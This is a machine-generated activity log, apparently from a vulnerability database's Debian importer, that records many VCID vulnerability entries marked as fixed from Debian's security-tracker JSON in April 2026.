2026-04-16T09:03:00.492210+00:00 Debian Importer Fixing VCID-d8yf-8rff-3yhf https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:02:28.361231+00:00 Debian Importer Fixing VCID-emmr-15qp-vfah https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:01:25.986874+00:00 Debian Importer Fixing VCID-4qbq-95vy-k7bv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:01:04.901026+00:00 Debian Importer Fixing VCID-wd77-5tpf-6yhy https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:00:56.729945+00:00 Debian Importer Fixing VCID-shzj-77rr-n3g4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:00:56.560743+00:00 Debian Importer Fixing VCID-3pky-3t1q-v3av https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:00:51.205532+00:00 Debian Importer Fixing VCID-t38m-c4zf-yqe6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:00:47.033263+00:00 Debian Importer Fixing VCID-xsue-s6sg-aqff https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:00:30.645136+00:00 Debian Importer Fixing VCID-z7e5-pt2s-x3a5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:00:26.821773+00:00 Debian Importer Fixing VCID-f6pf-5jnz-fkd1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:00:12.387415+00:00 Debian Importer Fixing VCID-vgvf-at1z-8ydr https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:00:03.084753+00:00 Debian Importer Fixing VCID-jxwd-tm1k-yqa2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:59:46.386129+00:00 Debian Importer Fixing VCID-g49y-ec8g-f7h4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:59:31.654823+00:00 Debian Importer Fixing VCID-qda9-n7gh-c7c4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:59:18.359051+00:00 Debian Importer Fixing VCID-cdsg-3312-zka6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:59:12.864597+00:00 Debian Importer Fixing VCID-jume-bjh7-f3hr https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:59:00.225500+00:00 Debian Importer Fixing VCID-rqdx-1pdv-a3bu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:58:44.538475+00:00 Debian Importer Fixing VCID-5jx9-7bd4-f3hk https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:58:39.297100+00:00 Debian Importer Fixing VCID-kd82-724m-77h8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:58:33.617719+00:00 Debian Importer Fixing VCID-ckma-a7b3-k3aw https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:58:24.733686+00:00 Debian Importer Fixing VCID-ghqa-k8ma-tfcs https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:58:17.160521+00:00 Debian Importer Fixing VCID-6279-tc7g-g3ag https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:58:16.479096+00:00 Debian Importer Fixing VCID-3bbh-2exn-m7ac https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:58:13.136124+00:00 Debian Importer Fixing VCID-w44j-ecnr-mkhv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:58:12.313484+00:00 Debian Importer Fixing VCID-7hxc-bmqq-pyf3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:58:04.755633+00:00 Debian Importer Fixing VCID-w1t7-1b22-jqe6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:57:42.697679+00:00 Debian Importer Fixing VCID-rzge-64xp-bfej https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:57:40.363884+00:00 Debian Importer Fixing VCID-n22y-f9az-fubm https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:57:39.172738+00:00 Debian Importer Fixing VCID-zjgp-g783-d3hy https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:57:35.609947+00:00 Debian Importer Fixing VCID-884z-9tnu-kfa5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:57:30.419799+00:00 Debian Importer Fixing VCID-zs46-dubn-wfga https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:57:24.435594+00:00 Debian Importer Fixing VCID-smpj-hz7t-8bhq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:57:07.163153+00:00 Debian Importer Fixing VCID-paf4-ycea-buae https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:56:33.346748+00:00 Debian Importer Fixing VCID-je5t-8uuq-ekdk https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:56:20.936820+00:00 Debian Importer Fixing VCID-rf1t-45cj-mue1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:55:55.945242+00:00 Debian Importer Fixing VCID-784p-34mz-vucz https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:55:43.590402+00:00 Debian Importer Fixing VCID-yspe-wj34-juck https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:55:43.298617+00:00 Debian Importer Fixing VCID-ak8s-9hyp-47fa https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:55:03.088277+00:00 Debian Importer Fixing VCID-fdav-btjk-pkbe https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:54:40.449774+00:00 Debian Importer Fixing VCID-jjzy-ch18-qkfp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:54:35.392848+00:00 Debian Importer Fixing VCID-72e3-s3pn-gbe5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:54:33.084336+00:00 Debian Importer Fixing VCID-zszf-nytw-jqgx https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:54:15.852318+00:00 Debian Importer Fixing VCID-gaat-4369-hug5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:54:15.035920+00:00 Debian Importer Fixing VCID-p2v1-1y51-cfg8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:54:06.509542+00:00 Debian Importer Fixing VCID-xgu5-jypk-h3bd https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:53:56.762782+00:00 Debian Importer Fixing VCID-karw-d7ee-3yhs https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:53:52.372611+00:00 Debian Importer Fixing VCID-ngzz-mwp9-rkdv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:53:21.766517+00:00 Debian Importer Fixing VCID-pj8s-qad1-6qdu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:53:06.208025+00:00 Debian Importer Fixing VCID-yqzg-rzp1-bbgm https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:53:05.880146+00:00 Debian Importer Fixing VCID-bum5-f5xb-akeg https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:53:05.832304+00:00 Debian Importer Fixing VCID-9akb-t56u-4yhr https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:53:00.579068+00:00 Debian Importer Fixing VCID-m4we-6udg-p7cj https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:52:47.044993+00:00 Debian Importer Fixing VCID-8zt8-za5g-s7e6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:52:45.524230+00:00 Debian Importer Fixing VCID-rmg9-7tdv-eyh4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:52:34.309368+00:00 Debian Importer Fixing VCID-xnkt-e7mn-e7du https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:52:21.901661+00:00 Debian Importer Fixing VCID-ur14-3rbn-j3ev https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:52:20.881231+00:00 Debian Importer Fixing VCID-bcy4-phg3-w3fq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:52:07.278627+00:00 Debian Importer Fixing VCID-25zp-duta-2ffk https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:51:50.668669+00:00 Debian Importer Fixing VCID-kfb4-xnqr-cya6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:51:50.621887+00:00 Debian Importer Fixing VCID-txgd-58rj-73a3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:51:37.159957+00:00 Debian Importer Fixing VCID-5y72-4n85-qyeb https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:51:22.525748+00:00 Debian Importer Fixing VCID-46ey-s7sy-9qby https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:51:21.178337+00:00 Debian Importer Fixing VCID-nsn7-a7z8-1qcd https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:51:04.448652+00:00 Debian Importer Fixing VCID-zdu5-rtg2-pffb https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:50:32.911829+00:00 Debian Importer Fixing VCID-e3ne-1hd5-dyfg https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:50:30.016398+00:00 Debian Importer Fixing VCID-qjrj-rdqd-uqdy https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:50:00.683650+00:00 Debian Importer Fixing VCID-s747-5kgj-pqeh https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:48:47.189521+00:00 Debian Importer Fixing VCID-anh4-1hmn-yfh8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:48:41.554206+00:00 Debian Importer Fixing VCID-b6c2-jyre-ykg9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:48:06.579885+00:00 Debian Importer Fixing VCID-8fa4-9jsh-3bh9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:48:01.681383+00:00 Debian Importer Fixing VCID-7wrg-6pw1-nucx https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:47:51.809308+00:00 Debian Importer Fixing VCID-y2nm-f9vb-d7ez https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:47:50.768804+00:00 Debian Importer Fixing VCID-ur3j-m1rh-q3dn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:47:30.375677+00:00 Debian Importer Fixing VCID-ehgb-g7qu-97an https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:47:28.150116+00:00 Debian Importer Fixing VCID-2yeg-fvbe-f3bz https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:47:20.605282+00:00 Debian Importer Fixing VCID-177y-cbh1-myay https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:47:19.205122+00:00 Debian Importer Fixing VCID-pnpw-8utk-uua7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:46:53.801663+00:00 Debian Importer Fixing VCID-6yn4-p8f4-pbh1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:46:43.209502+00:00 Debian Importer Fixing VCID-b5pd-kk97-gban https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:46:28.170603+00:00 Debian Importer Fixing VCID-rghj-fgdd-nke7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:46:09.877882+00:00 Debian Importer Fixing VCID-ps6p-v38m-6qe3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:45:59.813354+00:00 Debian Importer Fixing VCID-sz6p-kkuh-fkeu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:45:28.197794+00:00 Debian Importer Fixing VCID-jbhc-41ed-guap https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:45:17.319996+00:00 Debian Importer Fixing VCID-vc8u-8je2-kfgt https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:44:53.640495+00:00 Debian Importer Fixing VCID-wpsv-h9q7-pyep https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:44:45.493621+00:00 Debian Importer Fixing VCID-ra5y-ag3h-5yb8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:44:38.893983+00:00 Debian Importer Fixing VCID-8bac-p2pq-vkf1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:44:28.676679+00:00 Debian Importer Fixing VCID-x6sg-6k7v-9qd8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:44:17.495146+00:00 Debian Importer Fixing VCID-mcry-3vgm-kyh1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:44:03.486747+00:00 Debian Importer Fixing VCID-x6ad-gnf9-ebes https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:44:02.666100+00:00 Debian Importer Fixing VCID-5r21-bc2f-9fha https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:43:38.758489+00:00 Debian Importer Fixing VCID-yhmq-s1jh-17bh https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:43:26.290198+00:00 Debian Importer Fixing VCID-8862-dh13-hyga https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:43:16.590635+00:00 Debian Importer Fixing VCID-sdwh-3s12-17fr https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:43:01.631005+00:00 Debian Importer Fixing VCID-nsfn-bhe3-cbd4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:42:57.652683+00:00 Debian Importer Fixing VCID-ruf5-255v-sfdb https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:42:57.483319+00:00 Debian Importer Fixing VCID-pthp-wza7-hkgm https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:42:54.506957+00:00 Debian Importer Fixing VCID-5zkt-kcgx-a3e2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:42:33.053958+00:00 Debian Importer Fixing VCID-yub2-x8z7-d3e6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:42:30.113517+00:00 Debian Importer Fixing VCID-1ppp-hukx-syb3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:42:25.259665+00:00 Debian Importer Fixing VCID-dsee-yrq9-cuca https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:42:15.617337+00:00 Debian Importer Fixing VCID-a472-7128-s3eh https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:42:12.681246+00:00 Debian Importer Fixing VCID-u23c-4px5-c3g9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:41:59.878994+00:00 Debian Importer Fixing VCID-fvny-qu61-fbf4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:41:56.503917+00:00 Debian Importer Fixing VCID-ph82-atva-6kgd https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:41:43.615053+00:00 Debian Importer Fixing VCID-zfw4-5zqw-huh7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:41:43.219163+00:00 Debian Importer Fixing VCID-tqu8-qq9b-gkev https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:41:42.053103+00:00 Debian Importer Fixing VCID-fafu-jmw4-dqd9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:41:36.442783+00:00 Debian Importer Fixing VCID-23ws-9cmr-jffa https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:41:31.182645+00:00 Debian Importer Fixing VCID-jtkv-nvan-jbag https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:41:22.818589+00:00 Debian Importer Fixing VCID-g2k2-5sn8-t7dz https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:41:22.446876+00:00 Debian Importer Fixing VCID-x6ab-eb8b-t3e7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:41:19.105840+00:00 Debian Importer Fixing VCID-ytpg-f9mm-sbev https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:41:06.123346+00:00 Debian Importer Fixing VCID-pjm4-2g47-4qau https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:40:42.064790+00:00 Debian Importer Fixing VCID-kq6x-z56m-wqhh https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:40:40.980776+00:00 Debian Importer Fixing VCID-4nsq-h8ab-5kcj https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:40:25.424705+00:00 Debian Importer Fixing VCID-w278-q56x-j7fw https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:40:16.871671+00:00 Debian Importer Fixing VCID-x7g7-5k9x-gbay https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:40:11.840291+00:00 Debian Importer Fixing VCID-sj8x-sdpv-rkfy https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:39:51.324893+00:00 Debian Importer Fixing VCID-2t4v-16se-7qef https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:39:50.245800+00:00 Debian Importer Fixing VCID-3eje-68bz-k7ej https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:39:48.523599+00:00 Debian Importer Fixing VCID-tw4r-9r9b-4qez https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:39:36.020672+00:00 Debian Importer Fixing VCID-ap1a-jz5x-ybfv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:39:31.887532+00:00 Debian Importer Fixing VCID-dt8r-gjff-pqe4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:39:18.476211+00:00 Debian Importer Fixing VCID-ru3u-g5g8-zbcn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:39:14.847210+00:00 Debian Importer Fixing VCID-hcxd-bker-sqc1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:39:05.607610+00:00 Debian Importer Fixing VCID-7dqc-1d5h-uybs https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:39:00.232010+00:00 Debian Importer Fixing VCID-9ark-hra3-zyh9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:39:00.193810+00:00 Debian Importer Fixing VCID-wbx1-wdxc-k3bc https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:38:36.666268+00:00 Debian Importer Fixing VCID-9pr7-aw96-cqfb https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:38:29.457334+00:00 Debian Importer Fixing VCID-qxe7-vuy5-9ycg https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:38:26.093802+00:00 Debian Importer Fixing VCID-k1pr-h6c7-2fgp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:38:08.780106+00:00 Debian Importer Fixing VCID-zp6q-98qj-ykh1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T08:37:32.163475+00:00 Debian Importer Fixing VCID-5a4x-wwha-pufn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-13T09:15:52.375775+00:00 Debian Importer Fixing VCID-qtmc-prbr-jbc9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T09:15:20.886710+00:00 Debian Importer Fixing VCID-pk4j-w1q9-vqd2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T09:15:12.863490+00:00 Debian Importer Fixing VCID-267c-s4sq-9bfw https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T09:05:48.566750+00:00 Debian Importer Fixing VCID-k4w2-craz-13b9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T09:02:57.022142+00:00 Debian Importer Fixing VCID-uc6k-xc2v-kbas https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:54:19.539739+00:00 Debian Importer Fixing VCID-d74a-pd2n-6khw https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:53:44.277268+00:00 Debian Importer Fixing VCID-2uq7-pcfv-d7hv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:51:56.358161+00:00 Debian Importer Fixing VCID-u29f-6tep-cfdr https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:50:26.934610+00:00 Debian Importer Fixing VCID-bs5z-jh2d-nfgv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:47:39.038249+00:00 Debian Importer Fixing VCID-z9t9-bxf9-hkfk https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:47:23.290519+00:00 Debian Importer Fixing VCID-upce-8s7m-2kfk https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:46:36.132452+00:00 Debian Importer Fixing VCID-3yqe-cntb-t3fb https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:46:03.845080+00:00 Debian Importer Fixing VCID-rzvc-hba1-zfcy https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:45:48.975434+00:00 Debian Importer Fixing VCID-mxg1-261s-nbds https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:45:36.812095+00:00 Debian Importer Fixing VCID-32qk-mugj-73h4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:45:01.713038+00:00 Debian Importer Fixing VCID-dw5u-34qe-cuat https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:43:29.108341+00:00 Debian Importer Fixing VCID-w5bd-tn21-fqh7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:43:28.634735+00:00 Debian Importer Fixing VCID-xp3x-q8w4-myhb https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:42:09.643621+00:00 Debian Importer Fixing VCID-fduk-nxtd-uya3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:41:32.265022+00:00 Debian Importer Fixing VCID-x65n-6vuk-4ufk https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:41:30.642146+00:00 Debian Importer Fixing VCID-urv8-ve9y-e3b4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:38:49.210584+00:00 Debian Importer Fixing VCID-p4yb-mqca-v7c8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:36:39.441522+00:00 Debian Importer Fixing VCID-xfd9-xwru-aubv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:36:17.250038+00:00 Debian Importer Fixing VCID-vguv-n176-k3ch https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:36:04.245628+00:00 Debian Importer Fixing VCID-xbsu-ac6g-53fn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:35:55.437945+00:00 Debian Importer Fixing VCID-tnb2-7mvf-sqdk https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:34:56.214597+00:00 Debian Importer Fixing VCID-dkf5-8kww-mkhn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:34:21.509863+00:00 Debian Importer Fixing VCID-ujad-kteu-sfdu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:34:13.756956+00:00 Debian Importer Fixing VCID-f9z9-h8bt-9bg7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:33:33.543215+00:00 Debian Importer Fixing VCID-6nrh-wh65-nben https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:32:18.809046+00:00 Debian Importer Fixing VCID-8n3f-ass1-97gj https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:32:14.224966+00:00 Debian Importer Fixing VCID-fx9z-gbbd-q7aq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:30:13.035017+00:00 Debian Importer Fixing VCID-cmym-m1da-f3fg https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:29:51.733302+00:00 Debian Importer Fixing VCID-ydbk-11w9-wyen https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:29:48.448829+00:00 Debian Importer Fixing VCID-px2h-8ag6-s3ec https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:29:38.784958+00:00 Debian Importer Fixing VCID-3gtv-1gg5-5fh2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:28:46.314770+00:00 Debian Importer Fixing VCID-7mqx-nap6-97cr https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:28:16.471461+00:00 Debian Importer Fixing VCID-w9dc-fbc3-mudv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:27:09.520538+00:00 Debian Importer Fixing VCID-je9u-1h5v-hbct https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:27:08.979728+00:00 Debian Importer Fixing VCID-u9v8-n717-fyag https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:26:13.749115+00:00 Debian Importer Fixing VCID-hmcd-f6k1-kkd4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:26:08.852193+00:00 Debian Importer Fixing VCID-mhbe-8x14-f3d6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:25:30.023518+00:00 Debian Importer Fixing VCID-1rg8-dsrg-jbet https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:25:11.215359+00:00 Debian Importer Fixing VCID-znwq-9jw9-abgx https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:24:56.629347+00:00 Debian Importer Fixing VCID-ge69-ta6r-e3cj https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:23:47.384352+00:00 Debian Importer Fixing VCID-ywg5-azha-e7gt https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:23:44.472248+00:00 Debian Importer Fixing VCID-mg1t-vz1h-47b9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:23:34.147387+00:00 Debian Importer Fixing VCID-uf32-kpa6-fqe5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:22:47.363093+00:00 Debian Importer Fixing VCID-38vp-3yf8-aue8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:22:32.807213+00:00 Debian Importer Fixing VCID-hz8y-hdp6-t3bx https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:22:16.423482+00:00 Debian Importer Fixing VCID-vzhq-5h21-xuhk https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:21:50.550559+00:00 Debian Importer Fixing VCID-s4cu-swuc-9fh4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:20:42.878778+00:00 Debian Importer Fixing VCID-mmw7-4m3z-2kcn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:20:29.270858+00:00 Debian Importer Fixing VCID-bgej-fguz-9fcv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:20:22.906768+00:00 Debian Importer Fixing VCID-c8rr-y6zy-h7h5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:20:11.687199+00:00 Debian Importer Fixing VCID-dge7-469z-u7gq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:20:08.049759+00:00 Debian Importer Fixing VCID-j1hu-4c4d-ske6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:20:02.573404+00:00 Debian Importer Fixing VCID-twq8-ntkg-zbfk https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:19:58.513083+00:00 Debian Importer Fixing VCID-b43n-3d1g-u3fe https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:18:53.791631+00:00 Debian Importer Fixing VCID-s293-ewpe-3ufa https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:18:50.896907+00:00 Debian Importer Fixing VCID-yxwd-j8uj-tudx https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:18:20.635899+00:00 Debian Importer Fixing VCID-tzpa-13fk-7kc9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:17:53.638443+00:00 Debian Importer Fixing VCID-mpqt-5tap-57g1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:17:30.487145+00:00 Debian Importer Fixing VCID-57gx-fkgs-f7cb https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:16:28.594208+00:00 Debian Importer Fixing VCID-887b-1pwe-nqdd https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:16:00.595631+00:00 Debian Importer Fixing VCID-fykb-qjuw-3qcj https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:15:08.374865+00:00 Debian Importer Fixing VCID-x9m3-pune-akdj https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:14:02.408599+00:00 Debian Importer Fixing VCID-xgzr-fhu9-myed https://security-tracker.debian.org/tracker/data/json 38.3.0
